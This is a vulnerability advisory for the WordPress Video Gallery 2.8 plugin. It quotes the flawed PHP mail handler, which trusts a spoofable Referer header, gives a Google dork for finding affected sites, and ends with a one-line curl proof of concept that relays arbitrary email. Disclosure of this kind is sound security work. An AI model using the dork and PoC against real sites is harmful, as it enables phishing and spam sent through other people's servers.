WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay

######################

# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"
            

# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Description

 Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.
 
 This vulnerability is exploitable to dos, phishing, mailbombing, spam...
 
 The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
 
  /**
  * Email function
  */
 add_action( 'wp_ajax_email', 'email_function' );
 add_action( 'wp_ajax_nopriv_email', 'email_function' );
 
 function email_function() {
     require_once( dirname( __FILE__ ) . '/email.php' );
     die();
 }

 Any user can send email from /contus-video-gallery/email.php to any recipients.
 
 The variables used to send emails are:
 
 $to   = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
 $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
 $url  = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
 $subject  = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $message_content =  filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $title    = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
 $referrer = parse_url( $_SERVER['HTTP_REFERER'] );
 $referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
 $pageURL  = 'http';
 
 It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
 
 if ( $referrer_host === $pageURL ) {
     $headers = "MIME-Version: 1.0" . "\r\n";
     $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";	
     $headers .= "From: " . "<" . $from . ">\r\n";
     $headers .= "Reply-To: " . $from . "\r\n";
     $headers .= "Return-path: " . $from;
     $username = explode('@' , $from );   
     $username = ucfirst($username['0']);
     $subject  =  $username . ' has shared a video with you.';
     $emailtemplate_path  = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';	
     $message =  file_get_contents( $emailtemplate_path);
     $message = str_replace( '{subject}', $subject, $message );
     $message = str_replace( '{message}', $message_content, $message);
     $message = str_replace( '{videourl}',$url,$message );
     $message = str_replace('{username}',$username ,$message );
     if ( @mail( $to, $title, $message, $headers ) ) {
         echo 'success=sent';
     } else {
         echo 'success=error';
     }
 } else {
     echo 'success=error';
 }
 
 The “Referer” field can easily be modified by the attacker!

######################

# PoC

 curl -X POST -d "[email protected]&[email protected]&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
 -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

 cUrl switch "-e" spoof referer address

# Http Response

  success=sent 
  
# Poc Video

http://youtu.be/qgOGPm1-tNc
 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                [email protected]
                [email protected]

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################